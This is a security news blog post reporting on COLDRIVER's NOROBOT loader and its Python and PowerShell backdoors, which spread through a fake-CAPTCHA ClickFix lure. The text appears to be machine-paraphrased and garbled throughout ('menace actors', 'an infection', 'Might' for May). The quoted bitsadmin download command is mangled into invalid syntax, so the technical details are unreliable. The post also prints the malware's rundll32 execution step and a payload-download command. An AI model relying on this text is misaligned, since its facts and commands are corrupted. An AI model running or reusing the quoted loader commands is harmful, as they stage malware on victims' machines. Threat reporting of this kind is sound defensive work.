Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
New LOSTKEYS Malware Linked to Russia State-Sponsored Hacker Group COLDRIVER

New LOSTKEYS Malware Linked to Russia State-Sponsored Hacker Group COLDRIVER

Posted on October 21, 2025October 21, 2025 By CWS

Over the summer season of 2025, a novel malware household emerged following the general public disclosure of the LOSTKEYS implant.

This new pressure was quickly weaponized in a collection of extremely focused campaigns towards coverage advisors, non-governmental organizations, and dissidents.

Leveraging a refreshed lure referred to as COLDCOPY ClickFix, menace actors masqueraded the payload as a CAPTCHA verification to dupe customers into executing a malicious DLL by way of rundll32.

Early samples demonstrated an aggressive improvement tempo marked by a number of iterations of the downloader element and backdoor phases.

Google Cloud analysts famous that the loader, dubbed NOROBOT, started deployment inside days after LOSTKEYS was profiled.

Not like its predecessor— which relied on a multi-stage PowerShell method—NOROBOT invoked rundll32 iamnotarobot.dll,humanCheck to bootstrap the an infection chain.

Subsequent phases fetched partial cryptography keys and complementary payloads from attacker-controlled infrastructure, recombining elements to decrypt and set up a Python backdoor, YESROBOT.

Preliminary operations noticed YESROBOT deployed briefly in late Might earlier than being shortly changed by a streamlined PowerShell backdoor, MAYBEROBOT.

This transformation addressed the detection noise created by a bundled Python interpreter and enabled extra versatile command execution with out requiring a full interpreter runtime.

Each backdoors maintained minimal built-in features, counting on the operator to provide complicated instructions over HTTPS to a hardcoded command-and-control server.

Inside months, the malware reached its third main iteration, exhibiting not solely simplified supply but additionally rotating infrastructure and file naming conventions to evade community defenders.

Malware improvement overview illustrates this evolution, from the preliminary complicated downloader to the condensed logon script mechanism.

Malware improvement overview (Supply – Google Cloud)

COLDCOPY trying to lure the consumer to execute NOROBOT highlights the social engineering employed to trick targets into executing a seemingly innocuous DLL.

An infection Mechanism

The an infection begins when a consumer visits a compromised web page posing as a customized CAPTCHA. The web page prompts execution of iamnotarobot.dll, invoking the humanCheck export.

As soon as loaded, NOROBOT retrieves encrypted payload fragments by way of bitsadmin:-

bitsadmin /switch downloadJob /obtain /precedence regular %APPDATApercentlibsystemhealthcheck.py

Subsequent, the loader writes a part of the AES key to the registry and schedules a process to assemble and decrypt the ultimate payload.

This staged method forces defenders to gather a number of artifacts—downloads, registry entries, scheduled duties—to reconstruct the whole chain.

By splitting cryptographic keys and alternating downloader complexity, COLDRIVER maintains operational safety whereas exacting intelligence assortment from high-value targets.

Comply with us on Google Information, LinkedIn, and X to Get Extra Prompt Updates, Set CSN as a Most popular Supply in Google.

Cyber Security News Tags:COLDRIVER, Group, Hacker, Linked, LOSTKEYS, Malware, Russia, StateSponsored

Post navigation

Previous Post: Dataminr to Acquire ThreatConnect for $290 Million
Next Post: CISA Warns of Exploited Apple, Kentico, Microsoft Vulnerabilities

Related Posts

Cisco Hacked – Attackers Stolen Profile Details of users Registered on Cisco.com Cisco Hacked – Attackers Stolen Profile Details of users Registered on Cisco.com Cyber Security News
Microsoft Warns of Active Directory Domain Services Vulnerability, Let Attackers Escalate Privileges Microsoft Warns of Active Directory Domain Services Vulnerability, Let Attackers Escalate Privileges Cyber Security News
Ransomware Threats Exploit Employee Monitoring Tools Ransomware Threats Exploit Employee Monitoring Tools Cyber Security News
Fake Captcha Ecosystem Exploits Trusted Web Infrastructure to Deliver Malware Fake Captcha Ecosystem Exploits Trusted Web Infrastructure to Deliver Malware Cyber Security News
Salt Typhoon Using Zero-Day Exploits and DLL Sideloading Techniques to Attack Organizations Salt Typhoon Using Zero-Day Exploits and DLL Sideloading Techniques to Attack Organizations Cyber Security News
Windows 11 And Server 2025 Will Start Caching Plaintext Credentials By Enabling WDigest Authentication Windows 11 And Server 2025 Will Start Caching Plaintext Credentials By Enabling WDigest Authentication Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Muddled Libra Exploits VMware vSphere in Cyber Attack
  • Feiniu NAS Devices Targeted in Major Botnet Attack
  • Rapid SSH Worm Exploits Linux Systems with Credential Stuffing
  • Odido Telecom Hacked: 6.2 Million Accounts Compromised
  • Lazarus Group Targets npm and PyPI with Malicious Packages

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Muddled Libra Exploits VMware vSphere in Cyber Attack
  • Feiniu NAS Devices Targeted in Major Botnet Attack
  • Rapid SSH Worm Exploits Linux Systems with Credential Stuffing
  • Odido Telecom Hacked: 6.2 Million Accounts Compromised
  • Lazarus Group Targets npm and PyPI with Malicious Packages

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News